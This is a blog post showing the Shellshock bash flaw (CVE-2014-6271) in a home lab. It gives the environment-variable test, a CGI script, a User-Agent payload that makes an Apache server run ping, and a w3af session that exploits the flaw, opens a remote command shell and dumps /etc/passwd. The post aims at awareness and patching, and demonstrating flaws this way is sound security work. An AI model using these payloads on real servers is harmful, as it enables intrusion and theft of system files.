Having fun will Shellshock

Last week  CVE-2014-6271 came to surface, also known as shellshock.  A critical vulnerability that requires no authentication and can easily be exploited remotely.  This bash bug brought back memories of Heartbleed, where one of the most used applications in the world suffers an easily exploited vulnerability.

 

The main problem lies with the Bash Shell, which is a command processor used in all Unix-like operating systems (Linux, Unix, Mac OS, ..etc).  It runs processes statements run in environment variables.   What’s worse is, that the bash shell is used by web applications as well as SSH servers when processing certain commands and they do set environment variables.  The consequence is that any web application running bash, and those are usually cgi scripts running in perl, python, or php, may be vulnerable to remote code execution.     It was confirmed that Apache servers on Linux, for example, using cgi_mod are vulnerable.

 

Below is one demonstration to an Ubuntu OS with a vulnerable bash.

bricked@bricked:~$ bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)

 

The line of code below shows that the bash is vulnerable since the word “vulnerable” was printed after and “echo” command was written in an environment variable.  A bash which is not vulnerable would have not printed it.


bricked@bricked:~$ env x='() { :;}; echo vulnerable' bash -c ":" 2>/dev/null
vulnerable

 

I have an Apache 2.2 server running on this Ubuntu with the following cgi script named shellshock.cgi.


#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

The code seems harmless. After all, it is just output displayed on the screen. But the problem is, it is using bash. And worse, one of the main http parameters “User-Agent” sets an environment variable on the operating system called HTTP_USER_AGENT. Since any user can manually set the User-Agent, with the shellshock vulnerability, commands can be executed simply via setting the User-Agent variable. This can easily be done using wget, or curl.

 

In the case of this vulnerable web server a proof of concept can be shown simply by executing the following command from another machine that can reach the server.  Since this is on an internal network, I’m using internal IP address.  The address of this machine is 192.168.1.102, which means I can reach the page by simply requesting http://192168.1.102/cgi-bin/shellshock.cgi (shellshock.cgi being the name of the script).

However, before sending the request, I will set the User-Agent to something that will allow me to run a command.  In this case I pick this value:

() { test; }; echo \"Content-type:text/plain\" echo; echo; /bin/ping -c 3 192.168.1.1

 

Basically, this value , sets a dummy value, followed by an output, followed by a command to ping the gateway (192.168.1.1).  I can replace the ping command with other malicious commands (e.g. /bin/cat /etc/passwd)

Here’s what happens when setting the User-Agent string with the ping command.  The server basically starts pinging the gateway address as shown in tcpdump traffic.

 

 

Andres Riancho added a plugin on w3af that would detect a vulnerable web server and exploit it.


root@victim:~/Downloads/w3af# ./w3af_console
Checking if a new version is available in our git repository. Please wait...
An error occurred while updating: "An error occurred while fetching from the remote Git repository! Please update manually using "git pull"."
w3af>>> plugins
w3af/plugins>>> audit shellshock
Unknown plugin: 'shellshock'
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://192.168.1.102/cgi-bin/shellshock.cgi
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://192.168.1.102/cgi-bin/shellshock.cgi", using HTTP method GET. The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"". This vulnerability was found in the request with id 33.
Scan finished in 1 second.
Stopping the core...

The vulnerability is detected, now it’s time to exploit:


w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited. Generated shell object <os_commanding object (ruser: "www-data" | rsystem: "Linux bricked 3.8.0-29-generic x86_64 GNU/Linux")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "www-data" | rsystem: "Linux bricked 3.8.0-29-generic x86_64 GNU/Linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> execute /bin/cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
bricked:x:1000:1000:bricked,,,:/home/bricked:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:115:125:MySQL Server,,,:/nonexistent:/bin/false
tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
postfix:x:117:127::/var/spool/postfix:/bin/false

I was able to print /etc/passwd!

 

If you’re running a *nix like OS, check whether or not your system is vulnerable.  If it is, patch it immediately. Most distros released patches within a day of the vulnerability being disclosed.